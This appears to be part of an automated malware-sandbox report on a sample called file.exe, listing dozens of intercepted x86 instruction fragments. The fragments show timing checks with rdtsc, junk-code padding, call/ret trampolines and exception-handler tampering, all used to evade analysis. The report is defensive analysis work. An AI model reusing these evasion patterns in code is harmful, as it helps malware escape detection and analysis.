              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCCA6B second address: BCCAD3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F893453D393h 0x00000012 popad 0x00000013 pop eax 0x00000014 nop 0x00000015 push ecx 0x00000016 sub edi, 35816077h 0x0000001c pop esi 0x0000001d sub dword ptr [ebp+12456846h], edi 0x00000023 push 00000000h 0x00000025 sub edi, 0BFD5AE4h 0x0000002b mov edi, dword ptr [ebp+122D3693h] 0x00000031 push 00000000h 0x00000033 xchg eax, ebx 0x00000034 jmp 00007F893453D393h 0x00000039 push eax 0x0000003a pushad 0x0000003b jmp 00007F893453D38Dh 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 popad 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD45F second address: BCD465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD465 second address: BCD469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD469 second address: BCD46D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDDE5 second address: BCDDF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D390h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDDF9 second address: BCDE03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8934532D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDE03 second address: BCDE80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F893453D386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F893453D388h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 pushad 0x0000002a and esi, dword ptr [ebp+122D2910h] 0x00000030 add eax, dword ptr [ebp+122D1946h] 0x00000036 popad 0x00000037 mov di, CD1Fh 0x0000003b push 00000000h 0x0000003d mov dword ptr [ebp+122D26A0h], edi 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push edx 0x00000048 call 00007F893453D388h 0x0000004d pop edx 0x0000004e mov dword ptr [esp+04h], edx 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc edx 0x0000005b push edx 0x0000005c ret 0x0000005d pop edx 0x0000005e ret 0x0000005f or dword ptr [ebp+122D199Dh], ebx 0x00000065 jnc 00007F893453D38Ch 0x0000006b push eax 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDE80 second address: BCDE84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCDE84 second address: BCDE88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD1B4 second address: BCD1D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B826D3 second address: B826D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD09D4 second address: BD09E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD09E4 second address: BD09EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD09EA second address: BD09EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD09EE second address: BD0A5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F893453D388h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 mov si, cx 0x00000026 sub dword ptr [ebp+1244CD26h], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F893453D388h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov edi, dword ptr [ebp+122D27B4h] 0x0000004e mov dword ptr [ebp+1246E6F2h], eax 0x00000054 push 00000000h 0x00000056 movzx edi, dx 0x00000059 xchg eax, ebx 0x0000005a jl 00007F893453D392h 0x00000060 jl 00007F893453D38Ch 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD475F second address: BD4763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4D0A second address: BD4D17 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE61B second address: BCE62C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8934532D0Ah 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCF0CF second address: BCF0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCE62C second address: BCE630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD126E second address: BD1273 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1273 second address: BD128E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8934532D0Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD128E second address: BD1294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8B67 second address: BD8BDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F8934532D08h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 pushad 0x00000026 movsx eax, bx 0x00000029 jmp 00007F8934532D0Fh 0x0000002e popad 0x0000002f push 00000000h 0x00000031 mov edi, dword ptr [ebp+1244D2D2h] 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ebp 0x0000003c call 00007F8934532D08h 0x00000041 pop ebp 0x00000042 mov dword ptr [esp+04h], ebp 0x00000046 add dword ptr [esp+04h], 0000001Dh 0x0000004e inc ebp 0x0000004f push ebp 0x00000050 ret 0x00000051 pop ebp 0x00000052 ret 0x00000053 push eax 0x00000054 push ecx 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8BDC second address: BD8BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4E7F second address: BD4E89 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4E89 second address: BD4E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4E8F second address: BD4E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4E93 second address: BD4EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F893453D399h 0x00000012 popad 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAACB second address: BDAAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAAD0 second address: BDAB3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F893453D396h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e or di, DB90h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 sub ebx, 1E2F7144h 0x0000001c pop edi 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007F893453D388h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 jmp 00007F893453D38Bh 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jg 00007F893453D386h 0x00000048 jg 00007F893453D386h 0x0000004e popad 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAB3D second address: BDAB47 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8934532D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDAB47 second address: BDAB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD8CC4 second address: BD8D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push dword ptr fs:[00000000h] 0x0000000f mov bx, 878Bh 0x00000013 mov dword ptr fs:[00000000h], esp 0x0000001a mov di, dx 0x0000001d mov eax, dword ptr [ebp+122D0451h] 0x00000023 push FFFFFFFFh 0x00000025 jmp 00007F8934532D15h 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8934532D18h 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD9D3F second address: BD9D59 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F893453D38Ch 0x00000008 jno 00007F893453D386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 ja 00007F893453D38Eh 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDCA41 second address: BDCABC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8934532D0Eh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F8934532D11h 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F8934532D08h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub di, 15A2h 0x00000032 push 00000000h 0x00000034 jno 00007F8934532D0Bh 0x0000003a jnp 00007F8934532D0Ch 0x00000040 and ebx, 62AFA1A2h 0x00000046 push 00000000h 0x00000048 mov di, dx 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f js 00007F8934532D06h 0x00000055 pushad 0x00000056 popad 0x00000057 popad 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0A04 second address: BE0A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D38Ah 0x00000009 jg 00007F893453D386h 0x0000000f popad 0x00000010 push ebx 0x00000011 je 00007F893453D386h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0A22 second address: BE0A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F8934532D16h 0x0000000b jmp 00007F8934532D0Eh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0A42 second address: BE0A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jp 00007F893453D39Dh 0x0000000b jmp 00007F893453D395h 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F893453D386h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B85CD2 second address: B85CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE1034 second address: BE1049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F893453D391h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDDC72 second address: BDDC8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDCC07 second address: BDCC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D393h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE20DE second address: BE20ED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE20ED second address: BE20F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE20F1 second address: BE20FB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE11A6 second address: BE11AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE2387 second address: BE239F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8934532D14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE335E second address: BE340E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D398h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F893453D388h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 movsx edi, cx 0x0000002a push dword ptr fs:[00000000h] 0x00000031 call 00007F893453D38Dh 0x00000036 mov dword ptr [ebp+1246D144h], eax 0x0000003c pop edi 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 sub bh, 0000005Fh 0x00000047 clc 0x00000048 mov eax, dword ptr [ebp+122D0B75h] 0x0000004e mov ebx, dword ptr [ebp+122D37E9h] 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push ecx 0x00000059 call 00007F893453D388h 0x0000005e pop ecx 0x0000005f mov dword ptr [esp+04h], ecx 0x00000063 add dword ptr [esp+04h], 00000016h 0x0000006b inc ecx 0x0000006c push ecx 0x0000006d ret 0x0000006e pop ecx 0x0000006f ret 0x00000070 jmp 00007F893453D38Bh 0x00000075 push eax 0x00000076 jo 00007F893453D394h 0x0000007c push eax 0x0000007d push edx 0x0000007e jnl 00007F893453D386h 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDCC0 second address: BEDCC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE41 second address: BEDE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D396h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEDE5C second address: BEDE7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F8934532D06h 0x0000000a jmp 00007F8934532D15h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE1CE second address: BEE1D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE1D7 second address: BEE1E7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8934532D08h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE1E7 second address: BEE1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 je 00007F893453D386h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF166F second address: BF168D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jnc 00007F8934532D28h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8934532D0Bh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A075 second address: C2A07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A3CA second address: C2A3E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jnc 00007F893453D386h 0x00000015 pop ebx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2A3E0 second address: C2A400 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jnp 00007F8934532D06h 0x0000000b jmp 00007F8934532D0Ch 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2AC5E second address: C2AC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F893453D38Ah 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F893453D395h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2CE0B second address: C2CE32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007F8934532D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8934532D17h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2CE32 second address: C2CE56 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F893453D386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jng 00007F893453D386h 0x00000011 jmp 00007F893453D391h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C308D4 second address: C308E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8934532D06h 0x00000009 jmp 00007F8934532D0Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C308E9 second address: C3093A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007F893453D394h 0x0000000b jg 00007F893453D386h 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 jc 00007F893453D3AAh 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3093A second address: C30946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8934532D06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30C14 second address: C30C3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F893453D38Eh 0x00000007 jmp 00007F893453D397h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30C3D second address: C30C47 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8934532D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30D98 second address: C30DAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F893453D38Eh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30DAC second address: C30DC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8934532D10h 0x00000009 jno 00007F8934532D06h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C30DC6 second address: C30DCC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C312B4 second address: C312D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F8934532D19h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B6BE second address: C3B712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F893453D395h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jl 00007F893453D386h 0x00000017 jnc 00007F893453D386h 0x0000001d jmp 00007F893453D399h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jnc 00007F893453D386h 0x0000002b jg 00007F893453D386h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B712 second address: C3B716 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3B716 second address: C3B71C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BB9B second address: C3BB9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BB9F second address: C3BBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BCDF second address: C3BCF5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8934532D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F8934532D0Ch 0x00000010 jne 00007F8934532D06h 0x00000016 rdtsc
